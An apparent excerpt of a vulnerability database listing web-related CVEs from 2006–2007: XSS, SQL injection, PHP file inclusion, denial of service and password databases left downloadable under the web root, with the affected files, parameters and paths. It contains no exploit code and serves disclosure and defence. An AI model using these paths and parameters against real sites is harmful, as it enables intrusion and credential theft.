[CVE-2007-0185] Getahead Direct Web Remoting (DWR) before 1.1.4 allows attackers to cause a denial of service (memory exhaustion and servlet outage) via unknown vectors related to a large number of calls in a batch.
[CVE-2007-0184] Getahead Direct Web Remoting (DWR) before 1.1.4 allows attackers to obtain unauthorized access to public methods via a crafted request that bypasses the include/exclude checks.
[CVE-2007-0183] Cross-site scripting (XSS) vulnerability in /search in iPlanet Web Server 4.x allows remote attackers to inject arbitrary web script or HTML via the NS-max-records parameter. NOTE: The provenance of this information is unknown
[CVE-2007-0182] Multiple PHP remote file inclusion vulnerabilities in magic photo storage website allow remote attackers to execute arbitrary PHP code via a URL in the _config[site_path] parameter to (1) admin_password.php, (2) add_welcome_text.php, (3) admin_email.php, (4) add_templates.php, (5) admin_paypal_email.php, (6) approve_member.php, (7) delete_member.php, (8) index.php, (9) list_members.php, (10) membership_pricing.php, or (11) send_email.php in admin/
[CVE-2007-0181] PHP remote file inclusion vulnerability in include/common_function.php in magic photo storage website allows remote attackers to execute arbitrary PHP code via a URL in the _config[site_path] parameter.
[CVE-2007-0177] Cross-site scripting (XSS) vulnerability in the AJAX module in MediaWiki before 1.6.9, 1.7 before 1.7.2, 1.8 before 1.8.3, and 1.9 before 1.9.0rc2, when wgUseAjax is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-0176] Cross-site scripting (XSS) vulnerability in search/advanced_search.php in GForge 4.5.11 allows remote attackers to inject arbitrary web script or HTML via the words parameter.
[CVE-2007-0175] Cross-site scripting (XSS) vulnerability in htsrv/login.php in b2evolution 1.8.6 allows remote attackers to inject arbitrary web script or HTML via scriptable attributes in the redirect_to parameter.
[CVE-2007-0156] M-Core stores the database under the web document root, which allows remote attackers to obtain sensitive information via a direct request to db/uyelik.mdb.
[CVE-2007-0155] HarikaOnline 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for harikaonline.mdb.
[CVE-2007-0154] Webulas stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for db/db.mdb.
[CVE-2007-0153] AJLogin 3.5 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for ajlogin.mdb.
[CVE-2007-0152] OhhASP stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for db/OhhASP.mdb.
[CVE-2007-0151] MitiSoft stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for access_MS/MitiSoft.mdb.
[CVE-2007-0149] EMembersPro 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for users.mdb.
[CVE-2007-0148] Format string vulnerability in OmniGroup OmniWeb 5.5.1 allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via format string specifiers in the Javascript alert function.
[CVE-2007-0147] Cuyahoga before 1.0.1 installs the FCKEditor component with an incorrect deny statement in a Web.config file, which allows remote attackers to upload files when these privileges were intended only for the Administrator and Editor roles.
[CVE-2007-0146] Multiple cross-site scripting (XSS) vulnerabilities in Fix and Chips CMS 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter in (a) delete-announce.php
[CVE-2007-0144] Cross-site scripting (XSS) vulnerability in search.asp in Digitizing Quote And Ordering System 1.0 allows remote authenticated attackers to inject arbitrary web script or HTML via the ordernum parameter.
[CVE-2007-0141] Cross-site scripting (XSS) vulnerability in yald.php in Yet Another Link Directory 1.0 allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2007-0136] Multiple cross-site scripting (XSS) vulnerabilities in Drupal before 4.6.11, and 4.7 before 4.7.5, allow remote attackers to inject arbitrary web script or HTML via unspecified parameters in the (1) filter and (2) system modules. NOTE: some of these details are obtained from third party information.
[CVE-2007-0121] Cross-site scripting (XSS) vulnerability in search.asp in RI Blog 1.3 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2007-0120] Acunetix Web Vulnerability Scanner (WVS) 4.0 Build 20060717 and earlier allows remote attackers to cause a denial of service (application crash) via multiple HTTP requests containing invalid Content-Length values.
[CVE-2007-0119] Multiple cross-site scripting (XSS) vulnerabilities in EditTag 1.2 allow remote attackers to inject arbitrary web script or HTML via the plain parameter to (1) mkpw_mp.cgi, (2) mkpw.pl, or (3) mkpw.cgi.
[CVE-2007-0116] Digger Solutions Intranet Open Source (IOS) stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for data/intranet.mdb.
[CVE-2007-0110] Cross-site scripting (XSS) vulnerability in nidp/idff/sso in Novell Access Manager Identity Server before 3.0.0-1013 allows remote attackers to inject arbitrary web script or HTML via the IssueInstant parameter, which is not properly handled in the resulting error message.
[CVE-2007-0106] Cross-site scripting (XSS) vulnerability in the CSRF protection scheme in WordPress before 2.0.6 allows remote attackers to inject arbitrary web script or HTML via a CSRF attack with an invalid token and quote characters or HTML tags in URL variable names, which are not properly handled when WordPress generates a new link to verify the request.
[CVE-2007-0096] CarbonCommunities stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for DataBase/Carbon2.4d.mdb.
[CVE-2007-0094] Sven Moderow GuestBook 0.3a stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for (1) gbook97.mdb or (2) gbook.mdb in ~db/.
[CVE-2007-0093] SQL injection vulnerability in page.php in Simple Web Content Management System allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2007-0091] newsCMSlite stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for newsCMS.mdb.
[CVE-2007-0090] WineGlass stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for db/data.mdb.
[CVE-2007-0089] jgbbs stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for db/bbs.mdb.
[CVE-2007-0083] Cross-site scripting (XSS) vulnerability in Nuked Klan 1.7 and earlier allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in a getURL statement in a .swf file, as demonstrated by "Remote Cookie Disclosure." NOTE: it could be argued that this is an issue in Shockwave instead of Nuked Klan.
[CVE-2007-0079] rblog stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) data/admin.mdb or (2) data/rblog.mdb.
[CVE-2007-0078] BattleBlog stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for database/blankmaster.mdb.
[CVE-2007-0077] lblog stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for a certain file in admin/db/newFolder/.
[CVE-2007-0076] Openforum stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing user passwords via a direct request for openforum.mdb.
[CVE-2007-0075] AspBB stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing user passwords via a direct request for db/aspbb.mdb.
[CVE-2007-0067] Unspecified vulnerability in the Lotus Domino Web Server 6.0, 6.5.x before 6.5.6, and 7.0.x before 7.0.3 allows remote attackers to cause a denial of service (daemon crash) via requests for URLs that reference certain files.
[CVE-2007-0056] Multiple cross-site scripting (XSS) vulnerabilities in AShop Deluxe 4.5 and AShop Administration Panel allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter to (a) ashop/catalogue.php and (b) ashop/basket.php, the (2) exp parameter to ashop/catalogue.php, the (3) searchstring parameter to (c) ashop/search.php, the (4) checkout and (5) action parameters to (d) ashop/shipping.php, the cat parameter to (f) cart-path/admin/editcatalogue.php, and the (7) resultpage parameter to (g) cart-path/admin/salesadmin.php.
[CVE-2007-0054] Cross-site scripting (XSS) vulnerability in gbrowse.php in Belchior Foundry vCard PRO allows remote attackers to inject arbitrary web script or HTML via the sortby parameter.
[CVE-2007-0044] Adobe Acrobat Reader Plugin before 8.0.0 for the Firefox, Internet Explorer, and Opera web browsers allows remote attackers to force the browser to make unauthorized requests to other web sites via a URL in the (1) FDF, (2) xml, and (3) xfdf AJAX request parameters, following the # (hash) character, aka "Universal CSRF and session riding."
[CVE-2007-0024] Integer overflow in the Vector Markup Language (VML) implementation (vgx.dll) in Microsoft Internet Explorer 5.01, 6, and 7 on Windows 2000 SP4, XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted web page that contains unspecified integer properties that cause insufficient memory allocation and trigger a buffer overflow, aka the "VML Buffer Overrun Vulnerability."
[CVE-2006-7247] SQL injection vulnerability in the Weblinks (com_weblinks) component for Joomla! and Mambo 1.0.9 and earlier allows remote attackers to execute arbitrary SQL commands via the title parameter.
[CVE-2006-7238] Cross-site scripting (XSS) vulnerability in MyShoutPro before 1.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-7233] Cross-site scripting (XSS) vulnerability in the login form (login.jsp) of the admin console in Openfire (formerly Wildfire) 2.6.0, and possibly other versions before 3.5.3, allows remote attackers to inject arbitrary web script or HTML via the url parameter.
[CVE-2006-7209] Multiple cross-site scripting (XSS) vulnerabilities in phpTrafficA before 1.2beta2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to keywords results in the (1) main, (2) daily, (3) weekly, (4) monthly, (5) new trends, (6) individual page, and (7) search engine statistics.
[CVE-2006-7200] EMC RSA Security SiteKey issues challenge-bypass tokens that persist forever without a cancellation interface for end users, which makes it easier for attackers to bypass one stage of authentication by stealing and replaying a token.
[CVE-2006-7199] EMC RSA Security SiteKey allows remote attackers to display the correct image via a man-in-the-middle (MITM) attack in which an attacker-controlled server proxies authentication data to and from a legitimate SiteKey server. NOTE: the vendor disputes the severity of the issue, stating that it is easier to monitor this attack than "attacks against static web pages."
[CVE-2006-7198] Unspecified vulnerability in IBM WebSphere Application Server (WAS) before 5.1.1.14, and WAS for z/OS 601 before 6.0.2.13, has unknown impact and attack vectors, related to a "Potential security exposure," aka PK26123.
[CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
[CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
[CVE-2006-7190] Cross-site scripting (XSS) vulnerability in cgi-bin/user-lib/topics.pl in web-app.net WebAPP before 20060515 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the viewnews function, related to use of doubbctopic instead of doubbc.
[CVE-2006-7189] Cross-site scripting (XSS) vulnerability in cgi-bin/admin/logs.cgi in web-app.net WebAPP before 20060403 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the Statistics Log Viewer.
[CVE-2006-7188] The search function in cgi-lib/user-lib/search.pl in web-app.net WebAPP before 20060909 allows remote attackers to read internal forum posts via certain requests, possibly related to the $info{'forum'} variable.
[CVE-2006-7187] Cross-site scripting (XSS) vulnerability in the show_recent_searches function in cgi-lib/user-lib/search.pl in web-app.net WebAPP before 20060909 allows remote attackers to inject arbitrary web script or HTML via the srch variable.
[CVE-2006-7186] cgi-lib/subs.pl in web-app.net WebAPP before 0.9.9.3.5 allows attackers to open list files in "profile and other functions," a different vulnerability than CVE-2005-0927.
[CVE-2006-7166] IBM WebSphere Application Server (WAS) 5.1.1.9 and earlier allows remote attackers to obtain JSP source code and other sensitive information via "a specific JSP URL."
[CVE-2006-7165] IBM WebSphere Application Server (WAS) 5.0 through 5.1.1.0 allows remote attackers to obtain JSP source code and other sensitive information via certain "special URIs."
[CVE-2006-7164] SimpleFileServlet in IBM WebSphere Application Server 5.0.1 through 5.0.2.7 on Linux and UNIX does not block certain invalid URIs and does not issue a security challenge, which allows remote attackers to read secure files and obtain sensitive information via certain requests.
[CVE-2006-7158] Cross-site scripting (XSS) vulnerability in Oracle Application Express (APEX) before 2.2.1, aka Oracle HTML DB, allows remote attackers to inject arbitrary web script or HTML via the NOTIFICATION_MSG parameter. NOTE: it is likely that this issue overlaps one of the identifiers in CVE-2006-5351.
[CVE-2006-7149] Multiple cross-site scripting (XSS) vulnerabilities in Mambo 4.6.x allow remote attackers to inject arbitrary web script or HTML via (1) the query string to (a) index.php, which reflects the string in an error message from mod_login.php
[CVE-2006-7143] Cross-site scripting (XSS) vulnerability in Call Center Software 0.93 and earlier allows remote attackers to inject arbitrary web script or HTML via the problem description field.
[CVE-2006-7137] Cross-site scripting (XSS) vulnerability in TinyPortal before 0.8.6 allows remote attackers to inject arbitrary web script or HTML via the shoutbox.
[CVE-2006-7131] PHP remote file inclusion vulnerability in extras/mt.php in Jinzora 2.6 allows remote attackers to execute arbitrary PHP code via the web_root parameter.
[CVE-2006-7128] PHP remote file inclusion vulnerability in forum/forum.php JAF CMS 4.0 RC1 allows remote attackers to execute arbitrary PHP code via a URL in the website parameter.
[CVE-2006-7125] Cross-site scripting (XSS) vulnerability in Joomla BSQ Sitestats 1.8.0 and 2.2.1 allows remote attackers to inject arbitrary web script or HTML via the HTTP Referer header, which is not properly handled when the administrator views site statistics.
[CVE-2006-7122] Cross-site scripting (XSS) vulnerability in the IP Address Lookup functionality in BSQ Sitestats (component for Joomla) 1.8.0, and possibly other versions before 2.2.1, allows remote attackers to inject arbitrary web script and HTML via the ip parameter.
[CVE-2006-7114] P-News 2.0 stores db/user.txt under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as usernames and password hashes via a direct request. NOTE: this might be the same issue as CVE-2006-6888.
[CVE-2006-7107] PHP remote file inclusion vulnerability in upgrade.php in Coalescent Systems freePBX 2.1.3 allows remote attackers to execute arbitrary PHP code via a URL in the amp_conf[AMPWEBROOT] parameter.
[CVE-2006-7093] Cross-site scripting (XSS) vulnerability in Mambo LaiThai 4.5.4 Security Patch 2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-7078] Multiple cross-site scripting (XSS) vulnerabilities in Professional Home Page Tools Login Script, as of July 2006, allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) vorname, and (3) nachname parameters in the register script. NOTE: some details have been obtained from third party sources.
[CVE-2006-7076] Cross-site scripting (XSS) vulnerability in guestbook.php in Advanced Guestbook 2.4 for phpBB allows remote attackers to inject arbitrary web script or HTML via the entry parameter. NOTE: this issue might be resultant from SQL injection.
[CVE-2006-7073] Cross-site scripting (XSS) vulnerability in Opentools Attachment Mod before 2.4.5 allows remote attackers to inject arbitrary web script or HTML in Internet Explorer via unknown vectors related to the uploaded attachments form. NOTE: some details were obtained from third party information.
[CVE-2006-7072] Cross-site scripting (XSS) vulnerability in GeoClassifieds Enterprise 2.0.5.2 and earlier allows remote attackers to inject arbitrary web script and HTML via the (1) b[username] and (2) c parameters to (a) index.php, the b[username] parameter to (b) admin/index.php, and (3) c[phone] parameter to register.php.
[CVE-2006-7068] PHP remote file inclusion vulnerability in CliServ Web Community 0.65 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the cl_headers parameter to (1) menu.php3 and (2) login.php3.
[CVE-2006-7064] Cross-site scripting (XSS) vulnerability in forum/admin.php for Invision Power Board (IPB) 2.1.6 and earlier allows remote attackers to inject arbitrary web script or HTML as the administrator via the phpinfo parameter.
[CVE-2006-7061] Scriptsez.net E-Dating System stores data files with predictable names under the web document root with insufficient access control, which allows remote attackers to read private messages and leverage them for cross-site scripting (XSS) attacks.
[CVE-2006-7059] Multiple cross-site scripting (XSS) vulnerabilities in Scriptsez.net E-Dating System allow remote attackers to inject arbitrary web script or HTML via encoded entities (') in IMG tags to (1) messages, (2) profile fields, or (3) the id parameter in a dologin operation to cindex.php.
[CVE-2006-7058] Multiple cross-site scripting (XSS) vulnerabilities in Sphider before 1.3.1c allow remote attackers to inject arbitrary web script or HTML via the catid parameter to (1) templates/standard/search_form.html and (2) templates/dark/search_form.html. NOTE: the provenance of this information is unknown.
[CVE-2006-7043] Multiple cross-site scripting (XSS) vulnerabilities in Chipmunk Blogger allow remote authenticated users to inject arbitrary web script or HTML via script tags in (1) posts and (2) profile names.
[CVE-2006-7042] Cross-site scripting (XSS) vulnerability in directory/index.php in Chipmunk directory allows remote attackers to inject arbitrary web script or HTML via the start parameter.
[CVE-2006-7033] Cross-site scripting (XSS) vulnerability in Super Link Exchange Script 1.0 allows remote attackers to inject arbitrary web script or HTML via IMG tags in the search box.
[CVE-2006-7023] Multiple cross-site scripting (XSS) vulnerabilities in fx-APP 0.0.8.1 allow remote attackers to inject arbitrary HTML or web script via (1) the search box, and the (2) url, (3) website, (4) comment, and (5) signature fields in the profile, and possibly (6) a menu item.
[CVE-2006-7022] The Tools module in fx-APP 0.0.8.1 allows remote attackers to misrepresent the contents of a web page via an arbitrary URL in the url parameter to a showhtml action for index.php, which causes the URL to be displayed within an iframe.
[CVE-2006-7017] Multiple PHP remote file inclusion vulnerabilities in Indexu 5.0.1 allow remote attackers to execute arbitrary PHP code via a URL in the admin_template_path parameter to admin/ scripts (1) app_change_email.php, (2) app_change_pwd.php, (3) app_mod_rewrite.php, (4) app_page_caching.php, (5) app_setup.php, (6) cat_add.php, (7) cat_delete.php, (8) cat_edit.php, (9) cat_path_update.php, (10) cat_search.php, (11) cat_struc.php, (12) cat_view.php, (13) cat_view_hidden.php, (14) cat_view_hierarchy.php, (15) cat_view_registered_only.php, (16) checkurl_web.php, (17) db_alter.php, (18) db_alter_change.php, (19) db_backup.php, (20) db_export.php, (21) db_import.php, (22) editor_add.php, (23) editor_delete.php, (24) editor_validate.php, (25) head.php, (26) index.php, (27) inv_config.php, (28) inv_config_payment.php, (29) inv_create.php, (30) inv_delete.php, (31) inv_edit.php, (32) inv_markpaid.php, (33) inv_markunpaid.php, (34) inv_overdue.php, (35) inv_paid.php, (36) inv_send.php, (37) inv_unpaid.php, (38) lang_modify.php, (39) link_add.php, (40) link_bad.php, (41) link_bad_delete.php, (42) link_checkurl.php, (43) link_delete.php, (44) link_duplicate.php, (45) link_edit.php, (46) link_premium_listing.php, (47) link_premium_sponsored.php, (48) link_search.php, (49) link_sponsored_listing.php, (50) link_validate.php, (51) link_validate_edit.php, (52) link_view.php, (53) log_search.php, (54) mail_modify.php, (55) menu.php, (56) message_create.php, (57) message_delete.php, (58) message_edit.php, (59) message_send.php, (60) message_subscriber.php, (61) message_view.php, (62) review_validate.php, (63) review_validate_edit.php, (64) summary.php, (65) template_active.php, (66) template_add_custom.php, (67) template_delete.php, (68) template_delete_file.php, (69) template_duplicate.php, (70) template_export.php, (71) template_import.php, (72) template_manager.php, (73) template_modify.php, (74) template_modify_file.php, (75) template_rename.php, (76) user_add.php, (77) user_delete.php, (78) user_edit.php, (79) user_search.php, and (80) whos.php.
[CVE-2006-7004] Cross-site scripting (XSS) vulnerability in email_request.php in PSY Auction allows remote attackers to inject arbitrary web script or HTML via the user_id parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-7002] Cross-site scripting (XSS) vulnerability in add_comment.php in Wheatblog (wB) 1.1 allows remote attackers to inject arbitrary web script or HTML via the Email field. NOTE: the provenance of this information is unknown.
[CVE-2006-6996] Multiple cross-site scripting (XSS) vulnerabilities in warforge.NEWS 1.0 allow remote attackers to inject arbitrary HTML and web script via the (1) title and (2) newspost parameters to (a) newsadd.php, and the (3) name, title, and (4) comment parameters to (b) news.php, a different set of vectors than CVE-2006-1818. NOTE: the provenance of this information is unknown.
[CVE-2006-6993] Multiple SQL injection vulnerabilities in pages/addcomment2.php in Neuron Blog 1.1 allow remote attackers to inject arbitrary SQL commands via the (1) commentname, (2) commentmail, (3) commentwebsite, and (4) comment parameters. NOTE: the provenance of this information is unknown.
[CVE-2006-6983] Cross-domain vulnerability in MYweb4net Browser 3.8.8.0 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, a similar vulnerability to CVE-2006-3280.
[CVE-2006-6974] Headstart Solutions DeskPRO stores sensitive information under the web root with insufficient access control, which allows remote attackers to (1) list files in the includes/ directory
[CVE-2006-6968] Cross-site scripting (XSS) vulnerability in the group moderation control center page in Phorum before 5.1.19 might allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-6961] WebRoot Spy Sweeper 4.5.9 and earlier does not detect malware based on file contents, which allows remote attackers to bypass malware detection by changing a file's name.
[CVE-2006-6960] The Compression Sweep feature in WebRoot Spy Sweeper 4.5.9 and earlier does not handle non-ZIP archives, which allows remote attackers to bypass the malware detection via files with (1) RAR, (2) GZ, (3) TAR, (4) CAB, or (5) ACE compression.
[CVE-2006-6959] WebRoot Spy Sweeper 4.5.9 and earlier allows local users to bypass the "Startup-Shield" security restrictions by modifying certain registry keys.
[CVE-2006-6956] Microsoft Internet Explorer allows remote attackers to cause a denial of service (crash) via a web page that contains a large number of nested marquee tags, a related issue to CVE-2006-2723.
[CVE-2006-6955] Opera allows remote attackers to cause a denial of service (application crash) via a web page that contains a large number of nested marquee tags, a related issue to CVE-2006-2723.
[CVE-2006-6954] Flock beta 1 0.7 allows remote attackers to cause a denial of service (application crash) via a web page that contains a large number of nested marquee tags, a related issue to CVE-2006-2723.
[CVE-2006-6951] Cross-site scripting (XSS) vulnerability in blog.php in OdysseusBlog allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-6946] The web server in the NEC MultiWriter 1700C allows remote attackers to modify the device configuration via unspecified vectors.
[CVE-2006-6942] Multiple cross-site scripting (XSS) vulnerabilities in PhpMyAdmin before 2.9.1.1 allow remote attackers to inject arbitrary HTML or web script via (1) a comment for a table name, as exploited through (a) db_operations.php, (2) the db parameter to (b) db_create.php, (3) the newname parameter to db_operations.php, the (4) query_history_latest, (5) query_history_latest_db, and (6) querydisplay_tab parameters to (c) querywindow.php, and (7) the pos parameter to (d) sql.php.
[CVE-2006-6941] index.php in FreeWebshop 2.2.2 and earlier allows remote attackers to obtain sensitive information via an invalid action parameter in an info operation, which discloses the path in an error message.
[CVE-2006-6936] Cross-site scripting (XSS) vulnerability in Xtreme ASP Photo Gallery allows remote attackers to inject arbitrary HTML or web script via (1) the catname parameter to displaypic.asp or (2) the search field. NOTE: vector 1 likely overlaps CVE-2006-3032.
[CVE-2006-6934] Multiple cross-site scripting (XSS) vulnerabilities in Portix-PHP 0.4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) titre or (2) auteur field in a forum post.
[CVE-2006-6933] Easy Chat Server 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download certain files via direct requests to files such as (1) ServerKey.pem and (2) AcceptIP.txt. NOTE: The provenance of this information is unknown.
[CVE-2006-6929] Multiple cross-site scripting (XSS) vulnerabilities in Rapid Classified 3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to (a) reply.asp or (b) view_print.asp, the (2) SH1 parameter to (c) search.asp, the (3) name parameter to reply.asp, or the (4) dosearch parameter to (d) advsearch.asp.
[CVE-2006-6928] Multiple cross-site scripting (XSS) vulnerabilities in Rialto 1.6 allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter to (a) listmain.asp or (b) searchmain.asp, the (2) Keyword parameter to (c) searchkey.asp, or the (3) refno parameter to (d) forminfo.asp.
[CVE-2006-6925] Multiple cross-site scripting (XSS) vulnerabilities in bitweaver 1.3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the message title field when submitting an article to articles/edit.php, (2) the message title field when submitting a blog post to blogs/post.php, or (3) the message description field when editing in the Sandbox in wiki/edit.php.
[CVE-2006-6920] Cross-site scripting (XSS) vulnerability in Nucleus before 3.24 allows remote attackers to inject arbitrary web script or HTML via unknown vectors, possibly involving (1) lib/ADMIN.php and (2) lib/SKIN.php.
[CVE-2006-6916] Getahead Direct Web Remoting (DWR) before 1.1.3 allows attackers to cause a denial of service (infinite loop) via unknown vectors related to "crafted input."
[CVE-2006-6899] hidd in BlueZ (bluez-utils) before 2.25 allows remote attackers to obtain control of the (1) Mouse and (2) Keyboard Human Interface Device (HID) via a certain configuration of two HID (PSM) endpoints, operating as a server, aka HidAttack.
[CVE-2006-6892] Cross-site scripting (XSS) vulnerability in the GetLocation function in online.php in Jonathon J. Freeman OvBB 0.13a allows remote attackers to inject arbitrary web script or HTML via the aRequest variable.
[CVE-2006-6891] Vz (Adp) Forum 2.0.3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the administrative account name and password hash via a direct request for users/admin.txt.
[CVE-2006-6890] Voodoo chat 1.0RC1b stores sensitive information under the web root with insufficient access control, which allows remote attackers to download passwords via a direct request for data/users.dat.
[CVE-2006-6889] FreeStyle Wiki (fswiki) 3.6.2 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request for config/user.dat.
[CVE-2006-6888] P-News 1.16 and 1.17 store sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the administrative account name and password hash via a direct request for db/user.dat.
[CVE-2006-6882] Cross-site scripting (XSS) vulnerability in golden book allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-6880] Multiple SQL injection vulnerabilities in code/guestadd.php in PHP-Update 2.7 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) newmessage, (2) newname, (3) newwebsite, or (4) newemail parameter.
[CVE-2006-6874] Multiple cross-site scripting (XSS) vulnerabilities in friend.php in eNdonesia 8.4 allow remote attackers to inject arbitrary web script or HTML via the (1) Message or (2) Your Name field. NOTE: The provenance of this information is unknown.
[CVE-2006-6871] Multiple cross-site scripting (XSS) vulnerabilities in eNdonesia 8.4 allow remote attackers to inject arbitrary web script or HTML via (1) the mod parameter in a viewlink operation in mod.php, (2) the intypeid parameter in a showinfo operation in the informasi module in mod.php, (3) the "your Friend" field in friend.php, or (4) the "Main Text" field in admin.php.
[CVE-2006-6868] Multiple cross-site scripting (XSS) vulnerabilities in Zen Cart Web Shopping Cart before 1.3.7 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-6866] STphp EasyNews PRO 4.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain usernames, email addresses, and password hashes via a direct request for data/users.txt.
[CVE-2006-6862] Multiple cross-site scripting (XSS) vulnerabilities in Outfront Spooky Login 2.7 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) login/login.asp or (2) login/register.asp.
[CVE-2006-6860] Buffer overflow in the sendToMythTV function in MythControlServer.c in MythControl 1.0 and earlier allows remote attackers to execute arbitrary code via a crafted sendStr string to the Bluetooth interface. NOTE: some of these details are obtained from third party information.
[CVE-2006-6859] SQL injection vulnerability in coupon_detail.asp in Website Designs For Less Click N' Print Coupons 2005.01 and earlier allows remote attackers to execute arbitrary SQL commands via the key parameter.
[CVE-2006-6857] Cross-site scripting (XSS) vulnerability in modules/credits/credits.php in Docebo LMS allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
[CVE-2006-6856] Direct static code injection vulnerability in WebText CMS 0.4.5.2 and earlier allows remote attackers to inject arbitrary PHP code into a script in wt/users/ via the im parameter during a profile edit (edycja) operation, which is then executed via a direct request for this script.
[CVE-2006-6855] AIDeX Mini-WebServer 1.1 early release 3 allows remote attackers to cause a denial of service (daemon crash) via a flood of HTTP GET requests, possibly related to display of HTTP log data by the GUI. NOTE: some of these details are obtained from third party information.
[CVE-2006-6853] Buffer overflow in Durian Web Application Server 3.02 freeware on Windows allows remote attackers to execute arbitrary code via a long string in a crafted packet to TCP port 4002.
[CVE-2006-6851] Multiple cross-site scripting (XSS) vulnerabilities in contact_us.php in ac4p Mobilelib gold 2 allow remote attackers to inject arbitrary web script or HTML via the (1) email or (2) errr parameter.
[CVE-2006-6845] Cross-site scripting (XSS) vulnerability in index.php in CMS Made Simple 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the cntnt01searchinput parameter in a Search action.
[CVE-2006-6844] Cross-site scripting (XSS) vulnerability in the optional user comment module in CMS Made Simple 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the user comment form.
[CVE-2006-6832] Cross-site scripting (XSS) vulnerability in Joomla! before 1.0.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to poll.php or the module title.
[CVE-2006-6829] Efkan Forum 1.0 and earlier store sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for forum.mdb. NOTE: The provenance of this information is unknown.
[CVE-2006-6825] Calendar MX BASIC 1.0.2 and earlier store sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for calendar.mdb. NOTE: The provenance of this information is unknown.
[CVE-2006-6824] Multiple cross-site scripting (XSS) vulnerabilities in Jim Hu and Chad Little PHP iCalendar 2.23 rc1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) getdate parameter in (a) day.php, (b) month.php, (c) year.php, (d) week.php, (e) search.php, (f) rss/index.php, (g) print.php, and (h) preferences.php
[CVE-2006-6822] myprofile.asp in Enthrallweb eClassifieds does not properly validate the MM_recordId parameter during profile updates, which allows remote authenticated users to modify certain profile fields of another account by specifying that account's username in a modified MM_recordId parameter.
[CVE-2006-6821] myprofile.asp in Enthrallweb eNews does not properly validate the MM_recordId parameter during profile updates, which allows remote authenticated users to modify certain profile fields of another account by specifying that account's username in a modified MM_recordId parameter.
[CVE-2006-6820] myprofile.asp in Enthrallweb eCoupons does not properly validate the MM_recordId parameter during profile updates, which allows remote authenticated users to modify certain profile fields of another account by specifying that account's username in a modified MM_recordId parameter.
[CVE-2006-6819] AlstraSoft Web Host Directory stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a backup database via a direct request for admin/backup/db.
[CVE-2006-6818] AlstraSoft Web Host Directory allows remote attackers to bypass authentication and change the admin password via a direct request to admin/config.
